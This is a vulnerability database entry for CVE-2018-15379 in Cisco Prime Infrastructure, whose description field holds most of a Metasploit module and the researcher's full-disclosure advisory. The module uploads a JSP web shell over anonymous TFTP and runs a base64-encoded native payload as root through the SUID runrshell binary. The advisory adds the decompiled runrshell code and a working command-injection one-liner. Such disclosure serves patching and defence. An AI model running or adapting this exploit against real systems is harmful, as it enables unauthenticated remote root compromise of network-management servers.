ID

VAR-201810-0571

CVE

CVE-2018-15379

TITLE

Cisco Prime Infrastructure for HTTP web Server permission vulnerability

DESCRIPTION

A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication. Cisco Prime Infrastructure is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution with root privileges within the context of the vulnerable application. This issue is being tracked by Cisco Bug ID CSCvk24890. This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions might also be affected, although 3.4.0.0.348 is the latest at the time of writing. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-15379' ], [ 'URL', 'https://seclists.org/fulldisclosure/2018/Oct/19'], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt' ], [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3723' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp' ] ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02', {} ] ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 04 2018' )) register_options( [ OptPort.new('RPORT', [true, 'The target port', 443]), OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]), OptBool.new('SSL', [true, 'Use SSL connection', true]), OptString.new('TARGETURI', [ true, "swimtemp path", '/swimtemp']) ]) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'swimtemp'), 'method' => 'GET' }) unless res vprint_error 'Connection failed' return CheckCode::Unknown end if res.code == 404 && res.body.length == 0 # at the moment this is the best way to detect # a 404 in swimtemp only returns the error code with a body length of 0, # while a 404 to another webapp or to the root returns code plus a body with content return CheckCode::Detected end CheckCode::Safe end def upload_payload(payload) lport = datastore['LPORT'] || (1025 + rand(0xffff-1025)) lhost = datastore['LHOST'] || "0.0.0.0" remote_file = rand_text_alpha(5..16) + '.jsp' tftp_client = Rex::Proto::TFTP::Client.new( "LocalHost" => lhost, "LocalPort" => lport, "PeerHost" => rhost, "PeerPort" => datastore['RPORT_TFTP'], "LocalFile" => "DATA:#{payload}", "RemoteFile" => remote_file, "Mode" => 'octet', "Context" => {'Msf' => self.framework, 'MsfExploit' => self}, "Action" => :upload ) print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'" tftp_client.send_write_request remote_file end def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe) native_payload_name = rand_text_alpha(3..9) var_raw = rand_text_alpha(3..11) var_ostream = rand_text_alpha(3..11) var_pstream = rand_text_alpha(3..11) var_buf = rand_text_alpha(3..11) var_decoder = rand_text_alpha(3..11) var_tmp = rand_text_alpha(3..11) var_path = rand_text_alpha(3..11) var_tmp2 = rand_text_alpha(3..11) var_path2 = rand_text_alpha(3..11) var_proc2 = rand_text_alpha(3..11) var_proc1 = rand_text_alpha(3..11) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2}); Thread.sleep(200); | var_proc3 = Rex::Text.rand_text_alpha(3..11) cleanup = %Q| Thread.sleep(200); Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2}); | jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh"); String #{var_path2} = #{var_tmp2}.getAbsolutePath(); PrintWriter #{var_pstream} = new PrintWriter(new FileOutputStream(#{var_path2})); #{var_pstream}.println("!#/bin/sh"); #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'"); #{var_pstream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2}); #{cleanup} } catch (Exception e) { } %> | jsp = jsp.gsub(/\n/, '') jsp = jsp.gsub(/\t/, '') jsp = jsp.gsub(/\x0d\x0a/, "") jsp = jsp.gsub(/\x0a/, "") return jsp end def exploit jsp_payload = generate_jsp_payload jsp_name = upload_payload(jsp_payload) # we land in /opt/CSCOlumos, so we don't know the apache directory # as it changes between versions... so leave this commented for now # ... and try to find a good way to clean it later print_warning "#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos" # register_files_for_cleanup(jsp_name) print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_name), 'method' => 'GET' }) handler end end . >> Unauthenticated remote code execution and privilege escalation in Cisco Prime Infrastructure >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 4/10/2018 / Last updated: 8/10/2018 >> Introduction: From the vendor's website ([1]): "Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users a all from one place. Cisco Prime Infrastructure offers support for 802.11ac, correlated wired-wireless client visibility, spatial maps, Radio Frequency prediction tools, and much more. Simplify the management of the wireless infrastructure while solving problems faster and with fewer resources. Cisco Prime Infrastructure offers new, guided workflows for the Intelligent WAN and Converged Access, based on Cisco best practices. These workflows make new branch rollouts easy and fast, from setting up devices and services to automatically managing and monitoring them. Cisco Prime Infrastructure offers fault, configuration, accounting, performance, and security (FCAPS) management with 360-degree views of Cisco Unified Computing System Series B Blade Servers and Series C Rack Servers and Cisco Nexus switches, including the Application-Centric Infrastructureaready Cisco Nexus 9000 Series Switches. Your data center is critical to service assurance. Device Packs offer ongoing support of new Cisco devices and software releases. It provides parity within each device family, eliminating gaps in management operations, especially when it comes to service availability and troubleshooting. Technology Packs deliver new features between releases, accelerating time to value for high-demand functionality. Large or global organizations often distribute network management by domain, region, or country. Cisco Prime Infrastructure Operations Center lets you visualize up to 10 Cisco Prime Infrastructure instances, scaling your management infrastructure while maintaining central visibility and control." >> Background and summary: Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution. A Metasploit module has been released with this advisory, and can be found at [2] and [3]. This module exploits the two vulnerabilities described in this advisory to achieve unauthenticated remote code execution as root on the CPI default installation. It should be integrated into Metasploit's repository in the coming weeks. A special thanks to Beyond Security and their SecuriTeam Secure Disclosure (SSD) programme, which have helped me disclose this vulnerability to the vendor. Their version of this advisory can be found in [2]. >> Technical details: #1 Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat CVE-2018-15379 Attack Vector: Remote Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected Most web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-<VERSION>/webapps. One of these applications is "swimtemp", which symlinks to /localdisk/tftp: ade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/ total 16 drwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT drwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO lrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -> /opt/CSCOlumos/wars/SSO-13.0.201.war drwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest lrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -> /opt/CSCOlumos/wars/ifm_poap_rest-3.70.21.war lrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -> /localdisk/tftp/ drwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacs lrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -> /opt/CSCOlumos/wars/webacs.war As the name implies, this is the directory used by tftp to store files. Cisco has also enabled the upload of files to this directory as tftpd is started with the -c (file create) flag, and it accepts anonymous connections: /usr/sbin/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s /localdisk/tftp The tftpd port is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the /localdisk/tftp/ directory. The web shell will then be available at https://<IP>/swimtemp/<SHELL>, and it will execute as the "prime" user, which is an unprivileged user that runs the Apache Tomcat server. #2 Vulnerability: runrshell Command Injection (no specific CVE was attributed to this vulnerability by Cisco; use CVE-2018-15379, same as vulnerability #1) Attack Vector: Local Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected The CPI virtual appliance contains a binary at /opt/CSCOlumos/bin/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in /opt/CSCOlumos/rcmds. The decompilation of this function is shown below: int main(int argc, char* argv, char* envp) { char dest; int i; setuid(0); setgid(0); setenv("PATH", "/opt/CSCOlumos/rcmds", 1); memcpy(&dest, "/bin/bash -r -c \"", 0x12uLL); for ( i = 1; argc - 1 >= i; ++i ) { strcat(&dest, argv[i]); strcat(&dest, " "); } strcat(&dest, "\""); return (system(&dest) & 0xFF00) >> 8; } As it can be seen above, the binary uses the system() function to execute: /bin/bash -r -c "<CMD>" ... with the PATH set to /opt/CSCOlumos/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc. However, due to the way system() function calls "bash -c", it is trivial to inject a command by forcing an end quote after <CMD> and the bash operator '&&': [prime@prime34 ~]$ /opt/CSCOlumos/bin/runrshell '" && /usr/bin/whoami #' root >> Fix: Vulnerability #1 has ben fixed fixed with the patch provided by Cisco in [4]. Vulnerability #2 does not appear to have been fixed as of the last update of this advisory. Please note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly. >> References: [1] https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html [2] https://blogs.securiteam.com/index.php/archives/3723 [3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_prime_inf_rce.rb [4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

lack of information

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Pedro Ribeiro

SOURCES

LAST UPDATE DATE

2024-11-23T22:21:55.116000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE